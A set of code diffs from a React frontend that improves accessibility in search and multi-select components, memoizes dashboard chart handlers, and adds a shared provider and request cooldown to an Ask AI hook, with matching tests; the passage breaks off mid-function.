-                <div className="truncate font-medium">{item.label}{item.type === "county" ? " County" : ""}</div>
-                {item.sub && <div className="text-[11px] text-on-surface-variant truncate">{item.sub}</div>}
-              </div>
+              <button
+                type="button"
+                id={optionId(listId, idx)}
+                role="option"
+                aria-selected={idx === highlightIdx}
+                onClick={() => handleSelect(item)}
+                onMouseEnter={() => setHighlightIdx(idx)}
+                className="flex-1 min-w-0 flex items-center gap-3 text-left"
+              >
+                <span aria-hidden="true" className="material-symbols-outlined text-[16px] text-on-surface-variant shrink-0">
+                  {iconForType(item.type)}
+                </span>
+                <div className="flex-1 min-w-0">
+                  <div className="truncate font-medium">{item.label}{item.type === "county" ? " County" : ""}</div>
+                  {item.sub && <div className="text-[11px] text-on-surface-variant truncate">{item.sub}</div>}
+                </div>
+              </button>
               {item.type === "favorite" ? (
                 <button
+                  type="button"
                   onClick={(e) => handleRemoveFavorite(item, e)}
                   className="p-1 hover:bg-surface-container-high rounded-full transition-colors shrink-0 min-w-[24px] min-h-[24px] flex items-center justify-center"
                   aria-label={`Remove ${item.label} from favorites`}
                 >
-                  <span className="material-symbols-outlined text-[14px] text-primary" style={{ fontVariationSettings: "'FILL' 1" }}>star</span>
+                  <span aria-hidden="true" className="material-symbols-outlined text-[14px] text-primary" style={{ fontVariationSettings: "'FILL' 1" }}>star</span>
                 </button>
               ) : item.type === "place" && item.lat != null ? (
                 (() => {
                   const saved = isFavorite(item.lat!, item.lng!);
                   return (
                     <button
+                      type="button"
                       onClick={(e) => saved ? handleRemoveFavorite(item, e) : handleSaveFavorite(item, e)}
                       className="p-1 hover:bg-surface-container-high rounded-full transition-colors shrink-0 min-w-[24px] min-h-[24px] flex items-center justify-center"
                       aria-label={saved ? `Remove ${item.label} from favorites` : `Save ${item.label} to favorites`}
                     >
                       <span
+                        aria-hidden="true"
                         className={`material-symbols-outlined text-[14px] ${saved ? "text-primary" : "text-on-surface-variant"}`}
                         style={saved ? { fontVariationSettings: "'FILL' 1" } : undefined}
                       >star</span>
@@ -204,7 +226,7 @@ export default function UnifiedSearchBar({
                   );
                 })()
               ) : null}
-            </button>
+            </div>
           </div>
         ))}
         {trimmed && countyMatches.length === 0 && nominatimResults.length === 0 && !nominatimLoading && trimmed.length >= 3 && (
@@ -246,19 +268,21 @@ export default function UnifiedSearchBar({
       {!mobileExpanded && (
         <div className="absolute top-3 right-28 z-20 md:hidden flex items-center gap-2">
           <button
+            type="button"
             onClick={() => setMobileExpanded(true)}
             className="flex items-center justify-center w-11 h-11 bg-surface-container-lowest/90 backdrop-blur-md rounded-full shadow-lg ghost-border text-on-surface"
             aria-label="Search"
           >
-            <span className="material-symbols-outlined text-[20px]">search</span>
+            <span aria-hidden="true" className="material-symbols-outlined text-[20px]">search</span>
           </button>
           <button
+            type="button"
             onClick={onGeolocate}
             disabled={locating}
             className={`flex items-center justify-center w-11 h-11 bg-surface-container-lowest/90 backdrop-blur-md rounded-full shadow-lg ghost-border text-on-surface-variant ${locating ? "animate-pulse" : ""}`}
             aria-label="My location"
           >
-            <span className="material-symbols-outlined text-[20px]">my_location</span>
+            <span aria-hidden="true" className="material-symbols-outlined text-[20px]">my_location</span>
           </button>
         </div>
       )}
@@ -268,10 +292,16 @@ export default function UnifiedSearchBar({
         <div className="absolute top-3 left-4 right-4 z-[45] md:hidden">
           <div ref={containerRef}>
             <div className="flex items-center gap-2 px-4 py-2 bg-surface-container-lowest rounded-full shadow-lg ghost-border">
-              <span className="material-symbols-outlined text-lg text-on-surface-variant">search</span>
+              <span aria-hidden="true" className="material-symbols-outlined text-lg text-on-surface-variant">search</span>
               <input
                 ref={mobileInputRef}
                 type="text"
+                role="combobox"
+                aria-expanded={expanded && allResults.length > 0}
+                aria-controls={mobileListId}
+                aria-haspopup="listbox"
+                aria-autocomplete="list"
+                aria-activedescendant={highlightIdx >= 0 ? optionId(mobileListId, highlightIdx) : undefined}
                 value={mobileQuery}
                 onChange={(e) => setMobileQuery(e.target.value)}
                 onKeyDown={handleKeyDown}
@@ -281,10 +311,12 @@ export default function UnifiedSearchBar({
                 className="flex-1 bg-transparent text-[16px] text-on-surface placeholder:text-on-surface-variant/60 outline-none ring-0 border-none"
               />
               <button
+                type="button"
                 onClick={() => { setMobileExpanded(false); setMobileQuery(""); close(); }}
                 className="p-1 hover:bg-surface-container rounded-full transition-colors"
+                aria-label="Close search"
               >
-                <span className="material-symbols-outlined text-[18px] text-on-surface-variant">close</span>
+                <span aria-hidden="true" className="material-symbols-outlined text-[18px] text-on-surface-variant">close</span>
               </button>
             </div>
             {renderResults(true)}
@@ -307,12 +339,18 @@ export default function UnifiedSearchBar({
           onKeyDown={(e) => { if (!expanded && (e.key === "Enter" || e.key === " ")) { e.preventDefault(); setExpanded(true); } }}
           aria-label={expanded ? undefined : "Open search"}
         >
-          <span className="material-symbols-outlined text-[20px] text-on-surface-variant shrink-0">search</span>
+          <span aria-hidden="true" className="material-symbols-outlined text-[20px] text-on-surface-variant shrink-0">search</span>
           {expanded ? (
             <>
               <input
                 ref={inputRef}
                 type="text"
+                role="combobox"
+                aria-expanded={expanded && allResults.length > 0}
+                aria-controls={desktopListId}
+                aria-haspopup="listbox"
+                aria-autocomplete="list"
+                aria-activedescendant={highlightIdx >= 0 ? optionId(desktopListId, highlightIdx) : undefined}
                 value={query}
                 onChange={(e) => setQuery(e.target.value)}
                 onKeyDown={handleKeyDown}
@@ -325,10 +363,12 @@ export default function UnifiedSearchBar({
                 <span className="inline-block w-3 h-3 border-2 border-primary border-t-transparent rounded-full animate-spin shrink-0" />
               )}
               <button
+                type="button"
                 onClick={(e) => { e.stopPropagation(); close(); }}
                 className="p-0.5 rounded-full hover:bg-surface-container transition-colors"
+                aria-label="Close search"
               >
-                <span className="material-symbols-outlined text-[18px] text-on-surface-variant">close</span>
+                <span aria-hidden="true" className="material-symbols-outlined text-[18px] text-on-surface-variant">close</span>
               </button>
             </>
           ) : (
@@ -343,24 +383,30 @@ export default function UnifiedSearchBar({
       {/* ── Desktop: bottom controls (location + zoom) ── */}
       <div className="hidden md:flex absolute bottom-6 right-4 z-[35] flex-col items-center gap-1 p-1 bg-surface-container-lowest rounded-full shadow-lg">
         <button
+          type="button"
           onClick={onGeolocate}
           disabled={locating}
+          aria-label="My location"
           className={`p-3 text-on-surface-variant hover:text-on-surface transition-colors ${locating ? "animate-pulse" : ""}`}
         >
-          <span className="material-symbols-outlined">my_location</span>
+          <span aria-hidden="true" className="material-symbols-outlined">my_location</span>
         </button>
         <div className="h-[1px] w-6 bg-outline-variant/30" />
         <button
+          type="button"
           onClick={() => map?.zoomIn(1, { animate: true })}
+          aria-label="Zoom in"
           className="p-3 text-on-surface-variant hover:text-on-surface transition-colors"
         >
-          <span className="material-symbols-outlined">zoom_in</span>
+          <span aria-hidden="true" className="material-symbols-outlined">zoom_in</span>
         </button>
         <button
+          type="button"
           onClick={() => map?.zoomOut(1, { animate: true })}
+          aria-label="Zoom out"
           className="p-3 text-on-surface-variant hover:text-on-surface transition-colors"
         >
-          <span className="material-symbols-outlined">zoom_out</span>
+          <span aria-hidden="true" className="material-symbols-outlined">zoom_out</span>
         </button>
       </div>
     </>

--- a/frontend/src/components/stats/DashboardGrid.memo.test.tsx
+++ b/frontend/src/components/stats/DashboardGrid.memo.test.tsx
@@ -1,0 +1,137 @@
+import { describe, it, expect, beforeEach, vi } from "vitest";
+import { render } from "@testing-library/react";
+import type { ComponentProps } from "react";
+import { MemoryRouter } from "react-router-dom";
+import type { ChartSlot } from "../../lib/dashboard/types";
+
+/**
+ * H-F8 regression: inline arrow props (onEdit/onRemove/onMoveUp/onMoveDown) and
+ * per-call drag props previously handed every ChartCard fresh references on each
+ * grid render, defeating React.memo(ChartCard). These tests replace ChartCard
+ * with a render-counting React.memo mock and assert that:
+ *  - an unrelated grid re-render does NOT re-render the memoized cards, and
+ *  - the handler props are referentially stable across a real re-render.
+ */
+
+const hoisted = vi.hoisted(() => ({
+  renderCounts: {} as Record<string, number>,
+  lastProps: {} as Record<string, Record<string, unknown>>,
+}));
+
+vi.mock("./ChartCard", async () => {
+  const ReactMod = await import("react");
+  const Mock = (props: Record<string, unknown>) => {
+    const id = (props.slot as ChartSlot).id;
+    hoisted.renderCounts[id] = (hoisted.renderCounts[id] ?? 0) + 1;
+    hoisted.lastProps[id] = props;
+    return ReactMod.createElement("div", { "data-testid": `chart-${id}` });
+  };
+  return { default: ReactMod.memo(Mock) };
+});
+
+import DashboardGrid from "./DashboardGrid";
+
+const CHARTS: ChartSlot[] = [
+  { id: "a", dimension: "year", measure: "count", chartType: "bar", order: 0 },
+  { id: "b", dimension: "county", measure: "count", chartType: "bar", order: 1 },
+  { id: "c", dimension: "severity", measure: "count", chartType: "bar", order: 2 },
+];
+
+// Stable references shared across rerenders — mimics a parent that memoizes them.
+const DATA_BY_SLOT = {};
+const onAddChart = vi.fn();
+const onRemoveChart = vi.fn();
+const onUpdateChart = vi.fn();
+const onMoveChart = vi.fn();
+const onReorderChart = vi.fn();
+
+type GridProps = ComponentProps<typeof DashboardGrid>;
+
+function baseProps(overrides: Partial<GridProps> = {}): GridProps {
+  return {
+    charts: CHARTS,
+    dataBySlot: DATA_BY_SLOT,
+    mode: "advanced",
+    loading: false,
+    onAddChart,
+    onRemoveChart,
+    onUpdateChart,
+    onMoveChart,
+    onReorderChart,
+    closeConfigTrigger: 0,
+    ...overrides,
+  };
+}
+
+function renderGrid(props: GridProps) {
+  return render(
+    <MemoryRouter>
+      <DashboardGrid {...props} />
+    </MemoryRouter>,
+  );
+}
+
+describe("DashboardGrid ChartCard memoization", () => {
+  beforeEach(() => {
+    for (const k of Object.keys(hoisted.renderCounts)) delete hoisted.renderCounts[k];
+    for (const k of Object.keys(hoisted.lastProps)) delete hoisted.lastProps[k];
+    Object.defineProperty(window, "matchMedia", {
+      writable: true,
+      value: vi.fn().mockImplementation((query: string) => ({
+        matches: false,
+        media: query,
+        onchange: null,
+        addListener: vi.fn(),
+        removeListener: vi.fn(),
+        addEventListener: vi.fn(),
+        removeEventListener: vi.fn(),
+        dispatchEvent: vi.fn(),
+      })),
+    });
+  });
+
+  it("does not re-render memoized ChartCards when the grid re-renders for an unrelated reason", () => {
+    const { rerender } = renderGrid(baseProps());
+
+    expect(hoisted.renderCounts.a).toBe(1);
+    expect(hoisted.renderCounts.b).toBe(1);
+    expect(hoisted.renderCounts.c).toBe(1);
+
+    // Re-render the grid with an unrelated prop change (same charts / callbacks).
+    rerender(
+      <MemoryRouter>
+        <DashboardGrid {...baseProps({ closeConfigTrigger: 1 })} />
+      </MemoryRouter>,
+    );
+
+    // Memoized cards must not have re-rendered — their props stayed stable.
+    expect(hoisted.renderCounts.a).toBe(1);
+    expect(hoisted.renderCounts.b).toBe(1);
+    expect(hoisted.renderCounts.c).toBe(1);
+  });
+
+  it("keeps handler props referentially stable across a real re-render", () => {
+    const { rerender } = renderGrid(baseProps());
+
+    const first = hoisted.lastProps.a;
+    const firstOnEdit = first.onEdit;
+    const firstOnRemove = first.onRemove;
+    const firstOnMoveUp = first.onMoveUp;
+    const firstOnMoveDown = first.onMoveDown;
+
+    // Change a prop that IS forwarded to every card (loading) so the cards
+    // genuinely re-render, then confirm the handler identities are unchanged.
+    rerender(
+      <MemoryRouter>
+        <DashboardGrid {...baseProps({ loading: true })} />
+      </MemoryRouter>,
+    );
+
+    expect(hoisted.renderCounts.a).toBe(2); // re-rendered because `loading` changed
+    const second = hoisted.lastProps.a;
+    expect(second.onEdit).toBe(firstOnEdit);
+    expect(second.onRemove).toBe(firstOnRemove);
+    expect(second.onMoveUp).toBe(firstOnMoveUp);
+    expect(second.onMoveDown).toBe(firstOnMoveDown);
+  });
+});

--- a/frontend/src/components/stats/DashboardGrid.tsx
+++ b/frontend/src/components/stats/DashboardGrid.tsx
@@ -1,6 +1,7 @@
 import { useState, useEffect, useMemo } from "react";
 import type { ChartSlot, Dimension, Measure, ChartType } from "../../lib/dashboard/types";
 import type { ChartDataItem } from "../../hooks/useDashboardData";
+import type { DragHandleProps } from "../../hooks/useDragReorder";
 import type { ChartNarrativeResult } from "../../hooks/useNarrativeInsights";
 import type { CrossFilterAPI } from "../../hooks/useCrossFilter";
 import { useDragReorder } from "../../hooks/useDragReorder";
@@ -10,6 +11,17 @@ import AddChartCard from "./AddChartCard";
 import ChartConfigPanel from "./ChartConfigPanel";
 import ChartConfigSheet from "./ChartConfigSheet";
 import DragDropIndicator from "./DragDropIndicator";
+
+// Shared empty-data sentinel so charts without data keep a stable prop
+// reference across renders (a fresh `[]` per render would defeat React.memo).
+const EMPTY_DATA: ChartDataItem[] = [];
+
+type ChartHandlers = {
+  onEdit: () => void;
+  onRemove: () => void;
+  onMoveUp: () => void;
+  onMoveDown: () => void;
+};
 
 function slotKey(slot: ChartSlot): string {
   const opts = slot.options ?? {};
@@ -86,6 +98,33 @@ export default function DashboardGrid({
     enabled: isAdvanced && !!onReorderChart,
   });
 
+  // Stable per-chart callbacks keyed by id. Rebuilt only when the chart list or
+  // the underlying dashboard callbacks change — NOT on every grid re-render (e.g.
+  // per-pixel during a drag). Inline closures here previously handed each ChartCard
+  // fresh onEdit/onRemove/onMoveUp/onMoveDown props, defeating React.memo(ChartCard).
+  const chartHandlers = useMemo(() => {
+    const map: Record<string, ChartHandlers> = {};
+    for (const slot of charts) {
+      const id = slot.id;
+      map[id] = {
+        onEdit: () => setEditingId(id),
+        onRemove: () => onRemoveChart(id),
+        onMoveUp: () => onMoveChart(id, "up"),
+        onMoveDown: () => onMoveChart(id, "down"),
+      };
+    }
+    return map;
+  }, [charts, onRemoveChart, onMoveChart]);
+
+  // Stable per-chart drag-handle props. getHandleProps returns a fresh object per
+  // call, so memoize one per id; identity only changes when the chart list (or the
+  // handle handlers) change — keeping non-dragged ChartCard props referentially stable.
+  const handlePropsById = useMemo(() => {
+    const map: Record<string, DragHandleProps> = {};
+    for (const slot of charts) map[slot.id] = getHandleProps(slot.id);
+    return map;
+  }, [charts, getHandleProps]);
+
   const sheetOpen = isMobile && (configOpen || !!editingId);
   const sheetInitial = editingId ? editingSlot : undefined;
 
@@ -144,7 +183,8 @@ export default function DashboardGrid({
       >
         {charts.map((slot, idx) => {
           const itemProps = isAdvanced && onReorderChart ? getItemProps(slot.id, idx) : {};
-          const handleProps = isAdvanced && onReorderChart ? getHandleProps(slot.id) : null;
+          const handleProps = isAdvanced && onReorderChart ? handlePropsById[slot.id] : null;
+          const handlers = chartHandlers[slot.id];
 
           return editingId === slot.id && !isMobile ? (
             <ChartConfigPanel
@@ -161,14 +201,14 @@ export default function DashboardGrid({
               <ErrorBoundary>
                 <ChartCard
                   slot={slot}
-                  data={dataBySlot[slotKey(slot)] ?? []}
+                  data={dataBySlot[slotKey(slot)] ?? EMPTY_DATA}
                   secondaryData={secondarySlotKey(slot) ? dataBySlot[secondarySlotKey(slot)!] : undefined}
                   editing={isAdvanced}
                   loading={loading}
-                  onEdit={() => setEditingId(slot.id)}
-                  onRemove={() => onRemoveChart(slot.id)}
-                  onMoveUp={() => onMoveChart(slot.id, "up")}
-                  onMoveDown={() => onMoveChart(slot.id, "down")}
+                  onEdit={handlers.onEdit}
+                  onRemove={handlers.onRemove}
+                  onMoveUp={handlers.onMoveUp}
+                  onMoveDown={handlers.onMoveDown}
                   isFirst={idx === 0}
                   isLast={idx === charts.length - 1}
                   enterDelay={idx * 40}

--- a/frontend/src/components/ui/SearchableMultiSelect.test.tsx
+++ b/frontend/src/components/ui/SearchableMultiSelect.test.tsx
@@ -1,0 +1,76 @@
+import { describe, it, expect, vi } from "vitest";
+import { render, screen, fireEvent } from "@testing-library/react";
+import userEvent from "@testing-library/user-event";
+import { useState } from "react";
+import SearchableMultiSelect from "./SearchableMultiSelect";
+
+const OPTIONS = [
+  { value: "a", label: "Alameda" },
+  { value: "b", label: "Butte" },
+  { value: "c", label: "Colusa" },
+];
+
+function Harness({ initial = [] as string[] }) {
+  const [selected, setSelected] = useState<Set<string>>(new Set(initial));
+  const toggle = (v: string) =>
+    setSelected((prev) => {
+      const next = new Set(prev);
+      if (next.has(v)) next.delete(v);
+      else next.add(v);
+      return next;
+    });
+  return (
+    <SearchableMultiSelect options={OPTIONS} selected={selected} onToggle={toggle} placeholder="Search counties" />
+  );
+}
+
+describe("SearchableMultiSelect accessibility", () => {
+  it("exposes combobox + listbox semantics with aria-multiselectable", async () => {
+    render(<Harness />);
+    const input = screen.getByRole("combobox", { name: "Search counties" });
+    expect(input).toHaveAttribute("aria-haspopup", "listbox");
+    expect(input).toHaveAttribute("aria-expanded", "false");
+
+    await userEvent.click(input);
+    expect(input).toHaveAttribute("aria-expanded", "true");
+
+    const listbox = screen.getByRole("listbox");
+    expect(listbox).toHaveAttribute("aria-multiselectable", "true");
+    expect(input).toHaveAttribute("aria-controls", listbox.id);
+  });
+
+  it("each option exposes aria-selected reflecting the selected set", async () => {
+    render(<Harness initial={["a"]} />);
+    await userEvent.click(screen.getByRole("combobox"));
+
+    expect(screen.getByRole("option", { name: "Alameda" })).toHaveAttribute("aria-selected", "true");
+    expect(screen.getByRole("option", { name: "Butte" })).toHaveAttribute("aria-selected", "false");
+    // The decorative check icon must not leak "check" into the accessible name.
+    expect(screen.getByRole("option", { name: "Alameda" })).toHaveAccessibleName("Alameda");
+  });
+
+  it("closes on Escape and returns focus to the input", async () => {
+    render(<Harness />);
+    const input = screen.getByRole("combobox");
+    await userEvent.click(input);
+    expect(screen.getByRole("listbox")).toBeInTheDocument();
+
+    fireEvent.keyDown(input, { key: "Escape" });
+    expect(screen.queryByRole("listbox")).not.toBeInTheDocument();
+    expect(input).toHaveFocus();
+  });
+
+  it("supports arrow navigation with aria-activedescendant and Enter toggles", async () => {
+    const onToggle = vi.fn();
+    render(<SearchableMultiSelect options={OPTIONS} selected={new Set()} onToggle={onToggle} />);
+    const input = screen.getByRole("combobox");
+    await userEvent.click(input);
+
+    fireEvent.keyDown(input, { key: "ArrowDown" });
+    const first = screen.getByRole("option", { name: "Alameda" });
+    expect(input).toHaveAttribute("aria-activedescendant", first.id);
+
+    fireEvent.keyDown(input, { key: "Enter" });
+    expect(onToggle).toHaveBeenCalledWith("a");
+  });
+});

--- a/frontend/src/components/ui/SearchableMultiSelect.tsx
+++ b/frontend/src/components/ui/SearchableMultiSelect.tsx
@@ -1,4 +1,4 @@
-import { useState, useMemo, useRef, useEffect } from "react";
+import { useState, useMemo, useRef, useEffect, useId } from "react";
 
 interface SearchableMultiSelectProps {
   options: { value: string; label: string }[];
@@ -20,7 +20,11 @@ export default function SearchableMultiSelect({
 }: SearchableMultiSelectProps) {
   const [query, setQuery] = useState("");
   const [isOpen, setIsOpen] = useState(false);
+  const [activeIndex, setActiveIndex] = useState(-1);
   const containerRef = useRef<HTMLDivElement>(null);
+  const inputRef = useRef<HTMLInputElement>(null);
+  const listboxId = useId();
+  const optionId = (index: number) => `${listboxId}-opt-${index}`;
 
   // Clear search text when resetKey changes (e.g. Clear All)
   useEffect(() => {
@@ -49,6 +53,42 @@ export default function SearchableMultiSelect({
     [options, selected],
   );
 
+  // Keep the active option within range as the filtered list changes.
+  useEffect(() => {
+    setActiveIndex((i) => (i >= filtered.length ? filtered.length - 1 : i));
+  }, [filtered.length]);
+
+  const close = () => {
+    setIsOpen(false);
+    setActiveIndex(-1);
+    inputRef.current?.focus();
+  };
+
+  const handleKeyDown = (e: React.KeyboardEvent<HTMLInputElement>) => {
+    if (e.key === "Escape") {
+      if (isOpen) {
+        e.preventDefault();
+        close();
+      }
+    } else if (e.key === "ArrowDown") {
+      e.preventDefault();
+      if (!isOpen) {
+        setIsOpen(true);
+        return;
+      }
+      setActiveIndex((i) => Math.min(i + 1, filtered.length - 1));
+    } else if (e.key === "ArrowUp") {
+      e.preventDefault();
+      if (!isOpen) return;
+      setActiveIndex((i) => Math.max(i - 1, 0));
+    } else if (e.key === "Enter") {
+      if (isOpen && activeIndex >= 0 && activeIndex < filtered.length) {
+        e.preventDefault();
+        onToggle(filtered[activeIndex].value);
+      }
+    }
+  };
+
   return (
     <div ref={containerRef} className="relative">
       {/* Selected chips */}
@@ -64,11 +104,12 @@ export default function SearchableMultiSelect({
                 {opt.label}
                 {canDismiss && (
                   <button
+                    type="button"
                     onClick={() => onToggle(opt.value)}
                     className="hover:text-on-surface transition-colors p-0.5 min-w-[24px] min-h-[24px] flex items-center justify-center"
                     aria-label={`Remove ${opt.label}`}
                   >
-                    <span className="material-symbols-outlined text-[14px]">close</span>
+                    <span aria-hidden="true" className="material-symbols-outlined text-[14px]">close</span>
                   </button>
                 )}
               </span>
@@ -79,14 +120,22 @@ export default function SearchableMultiSelect({
 
       {/* Search input */}
       <div className="relative">
-        <span className="material-symbols-outlined absolute left-3 top-1/2 -translate-y-1/2 text-on-surface-variant text-lg">
+        <span aria-hidden="true" className="material-symbols-outlined absolute left-3 top-1/2 -translate-y-1/2 text-on-surface-variant text-lg">
           search
         </span>
         <input
+          ref={inputRef}
           type="text"
+          role="combobox"
+          aria-expanded={isOpen}
+          aria-controls={listboxId}
+          aria-haspopup="listbox"
+          aria-autocomplete="list"
+          aria-activedescendant={isOpen && activeIndex >= 0 ? optionId(activeIndex) : undefined}
           value={query}
           onChange={(e) => setQuery(e.target.value)}
           onFocus={() => setIsOpen(true)}
+          onKeyDown={handleKeyDown}
           placeholder={placeholder}
           aria-label={placeholder}
           className="w-full bg-surface-container-high border-none rounded-lg py-3 pl-10 pr-4 text-base md:text-sm text-on-surface placeholder:text-outline focus:ring-2 focus:ring-primary/20"
@@ -95,21 +144,35 @@ export default function SearchableMultiSelect({
 
       {/* Dropdown list */}
       {isOpen && (
-        <div className="absolute z-50 left-0 right-0 mt-1 max-h-48 overflow-y-auto bg-surface-container-lowest rounded-lg shadow-lg border border-outline-variant/15">
+        <div
+          id={listboxId}
+          role="listbox"
+          aria-multiselectable="true"
+          aria-label={placeholder}
+          className="absolute z-50 left-0 right-0 mt-1 max-h-48 overflow-y-auto bg-surface-container-lowest rounded-lg shadow-lg border border-outline-variant/15"
+        >
           {filtered.length === 0 ? (
             <div className="px-4 py-3 text-sm text-on-surface-variant">
               No results
             </div>
           ) : (
-            filtered.map((opt) => {
+            filtered.map((opt, idx) => {
               const isSelected = selected.has(opt.value);
               return (
                 <button
                   key={opt.value}
+                  type="button"
+                  id={optionId(idx)}
+                  role="option"
+                  aria-selected={isSelected}
                   onClick={() => onToggle(opt.value)}
-                  className="w-full flex items-center gap-3 px-4 py-2.5 text-sm text-left hover:bg-surface-container transition-colors"
+                  onMouseEnter={() => setActiveIndex(idx)}
+                  className={`w-full flex items-center gap-3 px-4 py-2.5 text-sm text-left transition-colors ${
+                    idx === activeIndex ? "bg-surface-container" : "hover:bg-surface-container"
+                  }`}
                 >
                   <span
+                    aria-hidden="true"
                     className={`material-symbols-outlined text-[18px] ${
                       isSelected ? "text-primary" : "text-transparent"
                     }`}

--- a/frontend/src/hooks/useAskAi.test.tsx
+++ b/frontend/src/hooks/useAskAi.test.tsx
@@ -41,9 +41,35 @@ describe("useAskAi", () => {
     await waitFor(() => expect(result.current.isLoading).toBe(false));
     expect(fetchMock).toHaveBeenCalledTimes(1);
 
+    // Jump past the 15s per-question cooldown; this test pins the
+    // inFlightRef reset, not the cooldown (covered below).
+    const realNow = Date.now.bind(Date);
+    vi.spyOn(Date, "now").mockImplementation(() => realNow() + 20_000);
+
     await act(async () => {
       await result.current.sendMessage("second question");
     });
     await waitFor(() => expect(fetchMock).toHaveBeenCalledTimes(2));
+  });
+
+  it("blocks a second question while the cooldown is active (no bypass via direct sendMessage)", async () => {
+    const fetchMock = vi.fn().mockResolvedValue(okResponse("hello"));
+    vi.stubGlobal("fetch", fetchMock);
+
+    const { result } = renderHook(() => useAskAi(), { wrapper });
+
+    await act(async () => {
+      await result.current.sendMessage("first question");
+    });
+    await waitFor(() => expect(result.current.isLoading).toBe(false));
+
+    // Still inside the 15s cooldown — every caller (Ask AI page, AI
+    // companion "Go deeper", retry) goes through sendMessage, so this
+    // must refuse rather than fire another request.
+    await act(async () => {
+      await result.current.sendMessage("second question");
+    });
+    expect(fetchMock).toHaveBeenCalledTimes(1);
+    expect(result.current.error).toMatch(/wait/i);
   });
 });

--- a/frontend/src/hooks/useAskAi.test.tsx
+++ b/frontend/src/hooks/useAskAi.test.tsx
@@ -1,8 +1,8 @@
 import { describe, it, expect, vi, beforeEach } from "vitest";
-import { renderHook, act, waitFor } from "@testing-library/react";
+import { render, renderHook, act, waitFor, screen, fireEvent } from "@testing-library/react";
 import { MemoryRouter } from "react-router-dom";
 import type { ReactNode } from "react";
-import { useAskAi } from "./useAskAi";
+import { useAskAi, AskAiProvider } from "./useAskAi";
 
 function okResponse(answer: string): Response {
   return {
@@ -21,7 +21,11 @@ function okResponse(answer: string): Response {
   } as unknown as Response;
 }
 
-const wrapper = ({ children }: { children: ReactNode }) => <MemoryRouter>{children}</MemoryRouter>;
+const wrapper = ({ children }: { children: ReactNode }) => (
+  <MemoryRouter>
+    <AskAiProvider>{children}</AskAiProvider>
+  </MemoryRouter>
+);
 
 describe("useAskAi", () => {
   beforeEach(() => {
@@ -71,5 +75,49 @@ describe("useAskAi", () => {
     });
     expect(fetchMock).toHaveBeenCalledTimes(1);
     expect(result.current.error).toMatch(/wait/i);
+  });
+
+  it("shares one conversation across two consumers of the provider", async () => {
+    const fetchMock = vi.fn().mockResolvedValue(okResponse("shared answer"));
+    vi.stubGlobal("fetch", fetchMock);
+
+    // Two independent components (mimicking AiCompanionProvider and AskAiPage)
+    // both call useAskAi under a SINGLE AskAiProvider.
+    function Consumer({ id }: { id: string }) {
+      const { messages, sendMessage } = useAskAi();
+      return (
+        <div>
+          <button onClick={() => sendMessage(`hi from ${id}`)}>send-{id}</button>
+          <span data-testid={`count-${id}`}>{messages.length}</span>
+          <span data-testid={`last-${id}`}>{messages[messages.length - 1]?.content ?? ""}</span>
+        </div>
+      );
+    }
+
+    render(
+      <MemoryRouter>
+        <AskAiProvider>
+          <Consumer id="a" />
+          <Consumer id="b" />
+        </AskAiProvider>
+      </MemoryRouter>,
+    );
+
+    // Both start empty.
+    expect(screen.getByTestId("count-a").textContent).toBe("0");
+    expect(screen.getByTestId("count-b").textContent).toBe("0");
+
+    // Send from consumer A.
+    await act(async () => {
+      fireEvent.click(screen.getByText("send-a"));
+    });
+
+    // Consumer B (a *different* component instance) must observe the same
+    // user + assistant messages — proving the state is shared, not duplicated.
+    await waitFor(() => expect(screen.getByTestId("count-b").textContent).toBe("2"));
+    expect(screen.getByTestId("count-a").textContent).toBe("2");
+    expect(screen.getByTestId("last-a").textContent).toBe("shared answer");
+    expect(screen.getByTestId("last-b").textContent).toBe("shared answer");
+    expect(fetchMock).toHaveBeenCalledTimes(1);
   });
 });

--- a/frontend/src/hooks/useAskAi.ts
+++ b/frontend/src/hooks/useAskAi.ts
@@ -78,6 +78,8 @@ export function useAskAi() {
 
   const messagesRef = useRef(messages);
   messagesRef.current = messages;
+  const cooldownEndRef = useRef(cooldownEnd);
+  cooldownEndRef.current = cooldownEnd;
   const inFlightRef = useRef(false);
   const abortRef = useRef<AbortController | null>(null);
 
@@ -99,6 +101,14 @@ export function useAskAi() {
 
   const sendMessage = useCallback(async (question: string) => {
     if (!question.trim() || isLoading || inFlightRef.current) return;
+    // Respect the cooldown (including server 429/503 backoff) for every
+    // caller, not just the Ask AI page's send button — e.g. the AI
+    // companion's "Go deeper" and retry() must not bypass it.
+    if (Date.now() < cooldownEndRef.current) {
+      const remaining = Math.ceil((cooldownEndRef.current - Date.now()) / 1000);
+      setError(`Please wait ${remaining}s before asking again.`);
+      return;
+    }
     inFlightRef.current = true;
     abortRef.current?.abort();
 

--- a/frontend/src/hooks/useAskAi.tsx
+++ b/frontend/src/hooks/useAskAi.tsx
@@ -1,4 +1,4 @@
-import { useState, useCallback, useEffect, useRef } from "react";
+import { createContext, useCallback, useContext, useEffect, useRef, useState, type ReactNode } from "react";
 import { useSearchParams } from "react-router-dom";
 import { API_BASE } from "../config";
 
@@ -43,6 +43,16 @@ interface AskResponse {
   tools_called: string[];
 }
 
+export interface AskAiApi {
+  messages: ChatMessage[];
+  isLoading: boolean;
+  error: string | null;
+  cooldownEnd: number;
+  sendMessage: (question: string) => Promise<void>;
+  retry: () => void;
+  clearConversation: () => void;
+}
+
 function loadMessages(): ChatMessage[] {
   try {
     const raw = sessionStorage.getItem(STORAGE_KEY);
@@ -66,7 +76,20 @@ function saveMessages(messages: ChatMessage[]) {
   }
 }
 
-export function useAskAi() {
+/**
+ * The single, shared source of truth for the Ask AI conversation. All of the
+ * conversation state (messages, cooldown, in-flight request) lives in exactly
+ * ONE instance of this hook, owned by <AskAiProvider>. Consumers reach it via
+ * the useAskAi() context hook below.
+ *
+ * Because there is only ever one live instance, the sessionStorage persistence
+ * runs once (not double-written by two providers), and the in-flight guard
+ * (inFlightRef / abortRef) is a single shared latch — if two consumers fire a
+ * request at the same instant, the second is refused by the same guard the Ask
+ * AI page already relies on. That's the simpler, safer choice: at most one
+ * outstanding /api/ask request across the whole app.
+ */
+function useAskAiState(): AskAiApi {
   const [messages, setMessages] = useState<ChatMessage[]>(loadMessages);
   const [isLoading, setIsLoading] = useState(false);
   const [error, setError] = useState<string | null>(null);
@@ -260,4 +283,32 @@ export function useAskAi() {
     retry,
     clearConversation,
   };
+}
+
+const AskAiContext = createContext<AskAiApi | null>(null);
+
+/**
+ * Owns the one and only Ask AI conversation instance. Mount this once, high
+ * enough in the tree to wrap every useAskAi() consumer (see App.tsx — it sits
+ * above both <AiCompanionProvider> and the <AskAiPage> route). Requires a
+ * router ancestor because the underlying state reads useSearchParams().
+ */
+export function AskAiProvider({ children }: { children: ReactNode }) {
